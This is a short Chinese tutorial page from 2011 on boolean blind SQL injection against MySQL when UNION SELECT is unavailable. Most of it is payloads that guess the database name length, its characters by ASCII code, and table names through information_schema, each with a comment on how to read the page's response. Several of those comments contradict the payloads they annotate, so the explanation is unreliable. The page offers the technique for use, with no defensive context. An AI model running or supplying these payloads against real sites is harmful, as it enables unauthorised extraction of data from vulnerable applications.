mysql不支持union select的盲注方法
添加時(shí)間:2011-3-1
添加:
admin
猜解數(shù)據(jù)庫長(zhǎng)度
and Length((database()))<10 //小于12返回正常說明數(shù)據(jù)庫是12位以下
and length((database()))<8 //小于8返回錯(cuò)誤說明數(shù)據(jù)庫名是9位的
猜解數(shù)據(jù)庫名
and ascii(substring((database()),1,1))=100 //100的ascii碼=d,說明不是d
and ascii(substring((database()),1,1))=122 //122存在說明數(shù)據(jù)庫名第一位是z
and ascii(substring((database()),2,1))=114 返回錯(cuò)誤說明不是ascii碼114=r 說明第二位不是r
and ascii(substring((database()),2,1))=115 返回正常說明第二位是s
.....
猜表
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))<10 #小于8返回正常表示表小于10
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))>9 #大于9返回錯(cuò)誤,表示值是9或8...
關(guān)健詞:mysql
新文章:
- CentOS7下圖形配置網(wǎng)絡(luò)的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統(tǒng)后丟失windows啟動(dòng)項(xiàng)
- CentOS單網(wǎng)卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗(yàn)證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網(wǎng)打印機(jī)IP講解
- CentOS7使用hostapd實(shí)現(xiàn)無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網(wǎng)絡(luò)重啟出錯(cuò)
- 解決Centos7雙系統(tǒng)后丟失windows啟動(dòng)項(xiàng)
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統(tǒng)有什么不同呢
- Centos 6.6默認(rèn)iptable規(guī)則詳解